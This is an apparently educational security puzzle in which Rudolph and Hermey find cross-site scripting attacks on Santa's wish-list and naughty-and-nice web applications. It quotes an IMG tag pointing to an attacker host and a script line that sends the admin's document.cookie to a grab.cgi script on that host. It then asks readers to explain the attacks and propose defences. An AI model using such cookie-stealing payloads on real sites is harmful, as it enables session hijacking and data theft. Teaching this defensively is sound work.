Holiday Crack the Hacker Challenge: Rudolph's XSS Christmas

The challenge
With the holiday season underway, Santa’s North Pole village was bustling. Children from around the world were sending a mountain of holiday wish lists, requesting all kinds of toys and goodies. As you would expect, their most popular requests included dolls, race cars and their very own copies of the new book Malware: Fighting Malicious Code. Yes, everyone at the North Pole was excitedly scurrying about to prepare for that magical night when Santa would deliver these gifts.

Well, almost everyone. Sadly, two North Pole denizens, Rudolph the Reindeer and Hermey the Elf, weren’t enjoying this holiday season. Rudolph suffered from a rare medical condition called Nasus Russus, which was complicated by Chronic Sonic Annoisia. In layman’s terms, he had a very shiny, red nose that emitted a piercing squeal when it glowed. His affliction was so bothersome that the other reindeer never let poor Rudolph join in any reindeer games, such as Quake, Doom, and SimChristmas. Rejected, Rudolph sought refuge by studying the finer points of information security legal issues.

Rudolph’s close buddy, Hermey, fared little better. A recent argument with the Chief Elf showed the awkwardness of his dilemma. “I don’t like to make toys,” Hermey stuttered reluctantly.

The Chief Elf responded in disbelief, “What!?! You don’t like to make toys? Would you mind telling me what you do want to do?”

Hermey replied dreamily, “Well, someday I’d like to be an information security professional. We need one up here. I’ve been studying malware, browser hacks, and incident handling.”

The Chief Elf shuddered in disgust and shouted, “Now listen, you! You're an elf—and elves make toys. Now get to work!”

Rudolph and Hermey consoled themselves by analyzing the implications of the North Pole’s new computing infrastructure, which was built of two related components. First, Santa deployed an online wish submission Web site. Children could surf to this site, fill out an HTML form with each of their wishes and submit the form for processing. On the back end, analyst elves used their browsers to log into the wish application with an administrative session and review each submitted request.

While analyzing each child’s wishes, the analyst elves could access the second component of Santa’s new infrastructure: a naughty-and-nice database Web application. With a child’s wishes displayed on the screen, an analyst elf could click on a hyperlink to review that child’s naughty-and-nice record. If the youngster’s name appeared on the nice list, the elf would process the child’s order, automatically loading the requested gifts onto the big jolly guy’s sleigh. For those children on the naughty list, the analyst would dispatch a lump of coal for that unhappy stocking.

One user-friendly aspect of the wish submission and naughty-and-nice applications was that an analyst elf only needed to log in once and could transparently access both applications from a single Web browser session.

Having been shunned by everyone at the North Pole, Hermey and Rudolph spent hours each evening analyzing the logs associated with these new Web applications. Some might consider such an activity boring, but Hermey and Rudolph reveled in it. One evening shortly before the big delivery night, Rudolph and Hermey noticed something shocking. One child had submitted the following text as a wish:

IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0

An even more disturbing “wish” followed in this same child’s list. The little darling had submitted this text:

document.location=’http://www.bumblesnowmonster.com/cgi-bin/grab.cgi?’+document.cookie

Hermey shouted, “It looks like some attackers are trying to hack Santa’s new applications. Why, with administrative control of Santa’s infrastructure, attackers could move themselves from the naughty list to the nice list!”

Rudolph trembled as he considered the legal implications. “With the naughty-and-nice database online, an attacker might be able to view personally identifiable information about innocent children. This could run Santa afoul of the new California Law SB 1386, which requires notifying any California consumers about exposure of their sensitive private data in a computer attack.” Rudolph and Hermey raced to notify Santa and block the attack.

Please help Rudolph and Hermey thwart the bad guy by answering the following four questions. If your answers are good, you’ll go down in history.

• What is the purpose of the first malicious wish text, and how does it work?
• What is the purpose of the second malicious wish text, and how does it work?
• How could Hermey and Rudolph thwart the first and second types of attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves’ browsers?
• Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children’s wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader’s configuration?